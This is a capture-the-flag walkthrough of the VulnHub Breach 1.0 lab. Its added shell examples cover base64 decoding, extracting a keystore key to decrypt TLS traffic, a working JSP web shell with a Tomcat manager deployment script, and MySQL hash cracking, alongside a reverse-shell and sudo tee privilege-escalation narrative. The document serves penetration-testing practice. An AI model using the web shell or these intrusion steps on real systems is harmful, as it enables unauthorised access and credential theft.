Breach 1.0 machine — Walkthrough
Hi guys, this is the eighth day and eighth box (D-8B for my personal reference). I will be trying to complete at least one box per day (two or more if I can) so I can gain confidence, learn new things, and prepare for the OSCP.
Wish me luck!
So, today I would like to work on Breach 1.0 machine, which is from VulnHub. Let’s get started!
— — — — — — — — — Please read to the end! Thank you! — — — — — — — — —
Enumeration
Nmap
The moment I ran it, I saw tons of open ports and freaked out for a moment, but it's okay. When nmap reports nearly every port as open, it is usually one thing answering on every port (a firewall or redirect rule) rather than thousands of real services, so probe a few of them by hand before trusting the list.
Gobuster
Running gobuster shows only an /images directory that we can access.
HTTP
This is the page shown when the target IP is entered. It looks like someone is not happy with the work or the company and left a parting gift.
There is a string in the page source that might be useful.
The string was base64-encoded twice. Using CyberChef, we can easily recover the original string, and it looks like a credential.
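As an added example (not part of the original write-up), the same decoding done from a shell: the function keeps base64-decoding while the result still looks like base64 and stays printable, so a string wrapped two or more times comes out in one call and real plaintext is left alone. The credential it decodes is constructed for the demo, not the box's real string.

```sh
#!/bin/sh
# Added example: peel nested base64 layers the way repeated "From Base64" in CyberChef would.
# Stops as soon as a layer is not valid base64 or decodes to non-printable bytes, so real
# plaintext (even one that happens to be base64-shaped) is not mangled into garbage.

peel_base64() {
    layer=$1
    depth=0
    # valid base64: groups of four base64 chars, optional "==" / "=" padding at the end
    b64_re='^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$'
    while [ -n "$layer" ] && printf '%s' "$layer" | grep -Eq "$b64_re"; do
        next=$(printf '%s' "$layer" | base64 -d 2>/dev/null) || break
        # control or 8-bit bytes mean we hit data, not another encoding layer
        if printf '%s' "$next" | LC_ALL=C grep -q '[^[:print:]]'; then
            break
        fi
        depth=$((depth + 1))
        printf 'layer %d: %s\n' "$depth" "$next" >&2
        layer=$next
    done
    printf '%s\n' "$layer"
}

# Constructed sample: a user:password pair encoded twice (not the value from the box).
sample=$(printf '%s' 'someuser:N0t-the-real-one' | base64 | tr -d '\n' | base64 | tr -d '\n')
peel_base64 "$sample"
```

Each intermediate layer goes to stderr and the final plaintext to stdout, so the function can be used in a pipeline.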
Then, we can click the image and it will lead us to /initech.html.
/initech.html
This is the page when it is loaded.
The page source again tells us the disgruntled employee is sitting at the beach reading other people's email.
Exploring the page!
/images/cake.jpg
Clicking the Cake navigation tab on the left shows us an image. I downloaded it to see if there is any hidden information.
But exiftool shows nothing unusual. Maybe I am overthinking, but sometimes it is good to cover all the possibilities.
/images/swingline.jpg
This loads when Stapler on the navigation bar is clicked.
/impresscms/user.php
Clicking on Employee Portal leads us here.
Try the login credentials we just found.
And we are in as Peter Gibbons.
Finding Useful items or things
We can see there are 3 new messages in the inbox. Let's check them.
FWD: Thank you for your purchase of Super Secret Cert Pro!
We can see that the user received a new SSL certificate, stored in /.keystore.
Posting sensitive content
So, there will be sensitive content in the admin portal. And the password is "extremely secure", or does it mean it is extremely secure? Let us find out.
/.keystore
When you browse to /.keystore, a file is downloaded automatically.
Then, searching for "ssl" in the search bar returns a result.
Clicking on the result, we see there is a pcap file we can analyse, and that the alias, store password and key password are all set to 'tomcat'.
Opening the pcap in Wireshark and using Follow TCP Stream, the traffic is encrypted (TLS) and we are not able to read it.
So, the keystore file must be the "key" to unlock it. After searching for some time, I located a possible method: extract the private key from the Java keystore.
Link: https://security.stackexchange.com/questions/3779/how-can-i-export-my-private-key-from-a-java-keytool-keystore
Then back to Wireshark to load the key we just extracted. Go to Edit -> Preferences -> Protocols -> TLS (older versions list it as SSL) -> RSA keys list -> Edit… and add an entry with:
IP address — target IP
Port — the http port
Protocol — http
Key file — the path to your key
Password — tomcat
Then, by following the HTTP stream, we get the following. (This only works because the server negotiated an RSA key-exchange suite; with a DHE/ECDHE suite the server's private key cannot recover the session keys, and Wireshark would need a key log file instead.)
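The keystore-to-Wireshark steps above, done from the command line as an added example (not the author's commands): keytool cannot emit PEM, so the key goes JKS -> PKCS#12 -> PEM, and tshark takes the same ip,port,protocol,keyfile entry as the Wireshark dialog. The alias and passwords follow the mail ("tomcat"); the 8443 port and file names are assumptions. Requires keytool, openssl and tshark on the attacking machine.

```sh
#!/bin/sh
# Added example: extract the RSA private key from a Java keystore and use it to decrypt the
# capture with tshark. Assumptions (not from the write-up): JKS format, HTTPS on 8443,
# file names .keystore / key.pem. Alias and both passwords are "tomcat" as the mail says.

# keytool cannot export a private key as PEM, so go JKS -> PKCS#12 -> PEM.
# Usage: jks_to_pem .keystore tomcat tomcat key.pem   (output path must end in .pem)
jks_to_pem() {
    jks=$1; alias=$2; pass=$3; out=$4
    p12="${out%.pem}.p12"
    keytool -importkeystore -noprompt \
        -srckeystore "$jks" -srcstoretype JKS -srcstorepass "$pass" \
        -srcalias "$alias" -srckeypass "$pass" \
        -destkeystore "$p12" -deststoretype PKCS12 -deststorepass "$pass" -destkeypass "$pass" \
        >/dev/null 2>&1 || return 1
    # -nocerts -nodes: only the key, unencrypted, which Wireshark reads directly.
    # Older keytools wrap PKCS#12 with ciphers that OpenSSL 3 only accepts with -legacy.
    openssl pkcs12 -in "$p12" -passin "pass:$pass" -nocerts -nodes -out "$out" 2>/dev/null ||
        openssl pkcs12 -legacy -in "$p12" -passin "pass:$pass" -nocerts -nodes -out "$out" 2>/dev/null ||
        return 1
    rm -f "$p12"
    openssl rsa -in "$out" -check -noout >/dev/null 2>&1
}

# The server key only recovers sessions that used RSA key exchange (TLS_RSA_* suites).
# Print the suite the server chose; an (EC)DHE suite means you need session keys instead.
server_cipher_suite() {
    tshark -r "$1" -Y 'tls.handshake.type == 2' -T fields -e tls.handshake.ciphersuite
}

# Same thing as the RSA keys list dialog: ip,port,protocol,keyfile.
# (Wireshark 3.x also accepts -o 'uat:rsa_keys:"key.pem",""' for the newer RSA Keys table.)
# Usage: decrypt_http capture.pcap 192.168.x.x 8443 key.pem
decrypt_http() {
    tshark -r "$1" -o "tls.keys_list:$2,$3,http,$4" \
        -Y 'http.request || http.response' \
        -T fields -e http.request.method -e http.request.full_uri -e http.authorization -e http.response.code
}
```

Run server_cipher_suite first: if the suite is not an RSA one, no amount of keystore work will decrypt the stream. The Authorization header that decrypt_http prints is what the next step decodes.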
Using CyberChef, we can decode the string.
Checking the stream further, we can see a URL that we will possibly be using.
Go to the URL and enter the credentials when prompted.
After checking, the only way I can think of at the moment is uploading a file, so I searched for how to do it.
Then, having prepared the WAR file, upload it to the server: first upload, then deploy.
Set up a netcat listener.
Wait for the connection after running the WAR file.
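As an added example (not the author's steps), the same upload done without the manager's HTML form: write a tiny JSP command shell, package it as a WAR, and push it through the Tomcat manager text interface with curl. The manager base URL, credentials and context path are assumptions; the text API needs the manager-script role, while the form the author used needs manager-gui.

```sh
#!/bin/sh
# Added example: build a minimal JSP web shell, package it as a WAR and deploy it through the
# Tomcat manager text API. Host, port, credentials and paths are all assumptions.

# Write index.jsp (runs ?cmd= through /bin/sh) plus a minimal web.xml so older Tomcats deploy it.
write_webshell_sources() {
    dir=$1
    mkdir -p "$dir/WEB-INF"
    cat > "$dir/index.jsp" <<'EOF'
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", c});
    InputStream in = p.getInputStream();
    int b;
    while ((b = in.read()) != -1) out.write(b);
}
%>
EOF
    cat > "$dir/WEB-INF/web.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5"></web-app>
EOF
}

# A WAR is just a zip with this layout. $2 must be an absolute path.
package_war() {
    dir=$1; war=$2
    ( cd "$dir" && zip -qr "$war" index.jsp WEB-INF )
}

# Deploy with the manager *text* interface: PUT the WAR to /manager/text/deploy.
# Usage: deploy_war https://10.0.0.5:8443 tomcat:password shell.war /shell
deploy_war() {
    base=$1; creds=$2; war=$3; ctx=$4
    curl -sk -u "$creds" -T "$war" "$base/manager/text/deploy?path=$ctx&update=true"
}

# Run a command through the deployed shell, e.g. run_cmd https://10.0.0.5:8443 /shell 'id'
run_cmd() {
    curl -sk --data-urlencode "cmd=$3" "$1$2/index.jsp"
}
```

With the listener up, run_cmd with a bash reverse-shell one-liner gives the same result as the msfvenom WAR; the difference is that this one is a command shell you can inspect line by line before uploading.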
Shell Finally!
Now we can upgrade the shell first:
python -c 'import pty; pty.spawn("/bin/bash")'
Going to milton's folder, we can see there is a some_script.sh.
Looks like there is nothing useful here.
Try to navigate around and see.
From the image above, we can see there is a database configured but no password. Then, we can see if there is anything we can use in the database.
Now, we can try to find it.
Then use mysql and show tables.
Then, select * from user;
We can then crack the hash or the strings using CrackStation.
Now exit mysql and switch user to milton with the cracked password.
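Before pasting a value from mysql.user into CrackStation it helps to know what you are looking at. Added example (not from the write-up): a shell helper that classifies a hash by its shape and checks wordlist candidates offline for the two common cases, the MySQL native format ("*" + SHA1(SHA1(password)) in upper-case hex) and a plain MD5 that a web application stored. The wordlist and hashes below are constructed for the demo and are not the box's values; openssl is required.

```sh
#!/bin/sh
# Added example: identify hash formats found in mysql.user and test wordlist candidates
# offline. Demo data is constructed; nothing here is the box's real hash.

# MySQL "native" PASSWORD(): "*" + SHA1(SHA1(password)) as upper-case hex.
mysql_native_hash() {
    printf '%s' "$1" | openssl dgst -sha1 -binary | openssl dgst -sha1 -hex | awk '{print "*" toupper($NF)}'
}

md5_hash() {
    printf '%s' "$1" | openssl dgst -md5 -hex | awk '{print $NF}'
}

# Classify by shape; this decides which cracker mode (or which CrackStation tab) applies.
identify_hash() {
    if   printf '%s' "$1" | grep -Eq '^\*[0-9A-Fa-f]{40}$'; then echo mysql-native
    elif printf '%s' "$1" | grep -Eq '^[0-9A-Fa-f]{32}$';   then echo md5        # app hash, not MySQL's
    elif printf '%s' "$1" | grep -Eq '^[0-9A-Fa-f]{16}$';   then echo mysql-old  # pre-4.1 OLD_PASSWORD()
    else echo unknown; fi
}

# crack_hash HASH WORDLIST -> prints the matching word; exit 1 if none, 2 if unsupported format
crack_hash() {
    target=$(printf '%s' "$1" | tr 'a-f' 'A-F')
    kind=$(identify_hash "$1")
    while IFS= read -r word || [ -n "$word" ]; do
        case $kind in
            mysql-native) cand=$(mysql_native_hash "$word") ;;
            md5)          cand=$(md5_hash "$word" | tr 'a-f' 'A-F') ;;
            *)            return 2 ;;
        esac
        if [ "$cand" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed demo: a three-word list and the native hash of "password".
wl=$(mktemp)
printf 'admin\nletmein\npassword\n' > "$wl"
crack_hash '*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19' "$wl"   # -> password
rm -f "$wl"
```

The query worth running on the box is select User, Host, Password from mysql.user (authentication_string on newer servers); if the value is 32 hex characters with no leading "*", it is not something MySQL produced and the crack mode has to be MD5.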
TO MILTON!
I tried sudo -l to check privileges, but it failed.
So, we meet again, PEAS.
Note: you can download it to /tmp and make it executable with chmod +x (777 is more than it needs).
And we found this, and it looks good.
The file:
I tried to use it, but I am not able to write the file (I still need more learning). Then, I tried another method.
Also, I found an interesting file here:
Looks like some script is run every 2 minutes.
To Root!
After checking, we can see there is a bill.png. We can use exiftool to read its metadata.
Then we get something in the Comment field.
We can try switching user to blumbergh, and it works!
Check for permission:
Showing the content of tidyup.sh:
We could use this to our advantage to get a reverse shell.
We can echo a reverse shell into it; set up a listener first.
I found it on GTFOBins for tee.
When I tried to use it, it failed when I included -a. BUT it succeeded when -a was excluded from the command.
Now try it without -a and see if it works. This is the expected behaviour when the sudoers entry names tee together with the script path: sudo matches the whole command line, so adding -a turns it into a different command that the rule does not permit.
Yes, and now we wait for the reverse connection…
YES, IT IS FINALLY DONE!
This box took me longer than expected… But I guess I learned something too, so it's a win for me.
Thank you for reading my write-up. I would like to improve my write-up skills in the future; you can reach me through Twitter or the comments. Sponsors are also welcome.
Twitter: https://twitter.com/curse_jk
Buy me coffee: http://buymeacoffee.com/Cursemagic
Other medium write-ups: https://cursemagic.medium.com